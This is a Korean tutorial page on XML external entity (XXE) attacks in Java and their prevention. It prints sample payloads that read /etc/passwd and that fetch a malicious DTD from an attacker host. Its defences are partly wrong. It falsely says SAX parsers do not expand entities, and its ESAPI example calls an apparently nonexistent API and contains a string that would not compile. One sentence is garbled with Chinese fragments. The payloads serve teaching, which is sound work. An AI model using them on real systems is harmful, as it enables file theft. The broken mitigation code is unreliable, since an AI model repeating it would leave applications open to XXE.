>Java >java지도 시간 >Java의 XML 외부 엔터티 공격 및 방지

Java의 XML 외부 엔터티 공격 및 방지

王林
王林원래의
2023-08-08 13:13:041350검색

Java의 XML 외부 엔터티 공격 및 방지

Java의 XML 외부 엔터티 공격 및 방지

소개:
XML(Extensible Markup Language)은 많은 응용 프로그램에서 널리 사용되며 데이터 저장 및 전송을 위한 범용 형식입니다. 그러나 XML 외부 엔터티 공격(XML 외부 엔터티, XXE)과 같은 XML 처리의 보안 취약성으로 인해 애플리케이션이 공격에 취약하므로 XXE 공격을 예방하고 보호해야 합니다. 이 기사에서는 XXE 공격의 원칙과 일반적인 공격 기법을 소개하고 몇 가지 일반적인 예방 조치와 코드 예제를 제공합니다.

1. XML 외부 엔터티 공격이란?
XML 외부 엔터티 공격은 XML 프로세서의 취약점을 악용하는 공격자가 외부 엔터티를 도입하고 중요한 파일을 읽거나 악의적인 작업을 수행하는 것을 말합니다. XML 외부 엔터티는 외부 문서나 리소스를 참조하기 위한 특수 메커니즘으로, 일반적인 상황에서는 응용 프로그램이 유용한 데이터를 얻는 데 도움이 될 수 있습니다. 그러나 공격자는 로컬 파일, 원격 파일을 읽고 명령을 실행하기 위해 악의적인 엔터티를 구성할 수 있습니다.

2. 일반적인 공격 기법

  1. DOCTYPE 문 공격
    공격자는 악의적인 DOCTYPE 문을 구성하여 XXE 공격을 유발할 수 있습니다. 예:

    <!DOCTYPE foo [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
    ]>

    위 코드에서 공격자는 DOCTYPE声明定义了一个实体xxe,它引用了/etc/passwd文件,攻击者可以通过解析含有这个DOCTYPE에서 선언한 XML 파일을 사용하여 민감한 파일을 성공적으로 읽었습니다.

  2. URL 엔터티 공격
    공격자는 URL 엔터티를 구성하여 XXE 공격을 유발할 수 있습니다. 예:

    <!ENTITY xxe SYSTEM "http://attacker.com/malicious.dtd">

    위 코드에서 공격자는 원격 서버에 악성 DTD 파일을 배치하고 URL을 참조하여 파일을 읽고 실행합니다.

3. 예방 조치 및 코드 예제
XXE 공격을 예방하고 방어하기 위해 다음 조치를 취할 수 있습니다.

  1. SAX 파서 사용
    SAX 파서는 이벤트 기반 XML 파싱 방법과 비교됩니다. 메모리 소비가 적고 엔터티 확장을 지원하지 않으므로 XXE 공격의 위험을 방지하는 DOM 파서. 다음은 SAX 파서를 사용하여 XML을 구문 분석하는 샘플 코드입니다.

    SAXParserFactory factory = SAXParserFactory.newInstance();
    SAXParser saxParser = factory.newSAXParser();
    XMLHandler handler = new XMLHandler();
    saxParser.parse(new File("example.xml"), handler);
  2. 외부 엔터티 구문 분석 비활성화
    XML 구문 분석 프로세스 중에 외부 엔터티 구문 분석을 비활성화하여 XXE 공격을 방지할 수 있습니다. 다음은 DOM 구문 분석기를 사용하여 외부 엔터티 구문 분석을 비활성화하는 샘플 코드입니다.

    DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
    factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
    DocumentBuilder builder = factory.newDocumentBuilder();
    Document document = builder.parse(new File("example.xml"));
  3. 보안 XML 구문 분석기 사용
    보안 XML 구문 분석기를 사용하면 XXE 공격에 대한 방어를 위해 OWASP ESAPI에서 제공되는 것과 같은 더 강력한 방어 기능을 제공할 수 있습니다. XML 파서. 다음은 OWASP ESAPI를 사용하여 XML을 구문 분석하는 샘플 코드입니다.

    String xmlContent = "<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>";
    String safeContent = ESAPI.encoder().canonicalize(xmlContent);
    SAXParserFactory factory = SAXParserFactory.newInstance();
    SAXParser parser = ESAPI.securityConfiguration().getSAXFactory().newSAXParser();
    parser.parse(new InputSource(new StringReader(safeContent)), new DefaultHandler());

결론:
XML 외부 엔터티 공격은 악성 XML 파일을 구성하여 민감한 정보를 읽거나 악의적인 작업을 수행할 수 있는 일반적인 보안 취약점입니다. XXE 공격으로부터 애플리케이션을 보호하기 위해 SAX 파서 사용, 외부 엔터티 파싱 비활성화, 보안 XML 파서 사용 등 일련의 방어 조치를 취할 수 있습니다. 이러한 예방 조치를 통해 애플리케이션의 보안을 강화하고 XXE 공격 위험을 줄일 수 있습니다.

위 내용은 Java의 XML 외부 엔터티 공격 및 방지의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

성명:
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.